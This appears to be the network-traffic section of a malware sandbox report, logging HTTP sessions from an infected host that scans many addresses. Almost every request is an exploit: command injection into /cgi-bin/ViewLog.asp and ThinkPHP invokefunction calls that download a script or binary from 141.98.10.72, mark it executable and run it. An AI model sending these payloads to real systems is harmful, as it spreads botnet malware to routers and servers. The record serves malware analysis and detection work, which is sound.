                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:25.795270920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:50.882225990 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        930192.168.2.143544494.111.60.2368080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:04.380669117 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        931192.168.2.144595831.136.21.608080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:04.385551929 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:07.620052099 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:13.763797045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:25.795321941 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:50.882282019 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        932192.168.2.145721285.138.153.728080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:04.392177105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:04.626199007 CET459INHTTP/1.1 403 Forbidden
                                                        Date: Wed, 14 Feb 2024 08:35:03 GMT
                                                        Server: Apache
                                                        X-Frame-Options: sameorigin
                                                        Content-Length: 228
                                                        Keep-Alive: timeout=15, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /cgi-bin/ViewLog.aspon this server.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        933192.168.2.145192695.86.109.1938080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:04.416980028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        934192.168.2.143631631.47.119.1458080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:04.421147108 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        935192.168.2.144490231.136.61.2298080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:04.587865114 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:05.284171104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:06.628047943 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:09.411945105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:14.787729025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:25.539374113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:48.834394932 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        936192.168.2.144594894.228.125.1188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:04.612473965 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:04.859889030 CET305INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:04 GMT
                                                        Server: Apache
                                                        Content-Length: 127
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 27 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                        Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port';</script><h1>Error 400 - trying to redirect</h1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        937192.168.2.144285695.136.97.4380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:06.018986940 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        938192.168.2.143478295.88.224.7680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:06.023195982 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:06.253098011 CET124INHTTP/1.1 404 Not Found
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 48 31 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e
                                                        Data Ascii: <H1>Error 404: Not Found</H1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        939192.168.2.144804695.163.228.23280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:06.027306080 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:06.261357069 CET339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 14 Feb 2024 08:35:06 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        940192.168.2.143637695.85.191.1178080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.123928070 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        941192.168.2.144026662.29.64.528080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.127876997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        942192.168.2.145208095.164.149.598080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:07.245143890 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:07.364211082 CET1260INHTTP/1.1 400 Bad Request
                                                        Server: squid/3.5.20
                                                        Mime-Version: 1.0
                                                        Date: Wed, 14 Feb 2024 08:35:07 GMT
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 3454
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Connection: close
                                                        Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 